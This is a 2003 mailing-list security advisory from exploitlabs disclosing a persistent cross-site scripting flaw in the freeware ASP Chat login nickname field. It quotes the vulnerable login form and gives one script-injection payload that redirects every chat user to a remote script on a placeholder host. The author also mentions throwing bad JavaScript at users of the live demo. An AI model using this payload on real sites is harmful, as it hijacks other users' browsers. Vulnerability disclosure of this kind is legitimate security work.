lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <Law11-OE23dsTgDO4W50004690a@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Asp Chat - .ASP XSS / JS Injection

------------------------------------------------------------------
          - EXPL-A-2003-008 exploitlabs.com Advisory 008
------------------------------------------------------------------
                 -= Asp Chat ( chat.asp ) =-



morning_wood
June 16, 2003
exploitlabs.com


Vunerability(s):
----------------
1. .ASP XSS / JS Injection

alot more im sure...


Product:
--------

AspChat
http://www.123apps.net/page.asp?page=aspchat


Description of product:
-----------------------

ASP Chat - Freeware
"Web based chat application with user friendly interface.
 Easy to install just copy to your folder where you want to use it.
 No database and no components needed. Download and use it for free."

Download:

http://download.123apps.net/files/aspchat.zip <-- dont work
http://www.zone-h.org/download/file=2848/



VUNERABILITY / EXPLOIT
======================
Remote:
-------
yup

exploit code here... ( not realy needed but it shows the basic flaw )

this is a direct rip of the login page, at
http://www.123apps.net/demo/aspchat/

------------ snippy -------------------

<body bgcolor="#FFCC99" topmargin="5">
<center>
<font face='verdana,arial' size='2'>Type nickname
<form action='chat.asp?event=login' method='post'>
<input type='text' name='login' size='10'>
<input type='submit' value='Enter'>
</form>
<hr size='1'>
ASP Chat by <a href='mailto:info@...apps.net'>123apps.net</a>

----------- end snippy ---------------

as we can see by the poc script there is no length checking on the
login.
the login name ( or script from poc )is "pushed" into chat as the user
name,
rendering XSS and remote includes by way of...

<SCRIPT>location.href="http://example.com/remote-nasty-script.ext;</sc
ript>

or whatever have you. all users are affected by this that are
currently logged in or
 log in later as there is some "persistance" as this...


http://www.123apps.net/demo/aspchat/  or

http://www.123apps.net/demo/aspchat/chat.asp    shows.

the depth of this has not been fully exploited, I leave it to the
vendor to fix ASAP.
oh... you can chat normaly and then decide to "throw" urls or bad js
at people ... i got bored real fast with that.




Vendor Fix:
-----------
No fix on 0day



Vendor Contact:
---------------
info@...apps.net - Concurrent with this advisory


Credits:
--------

morning_wood
http://exploitlabs.com "were finding your holes"
morning_wood@...me4.com - get tested


----------------------------------------

be a good vendor... test your products first, it is your problem, fix
it.

http://nothackers.org - it's t0day

Powered by blists - more mailing lists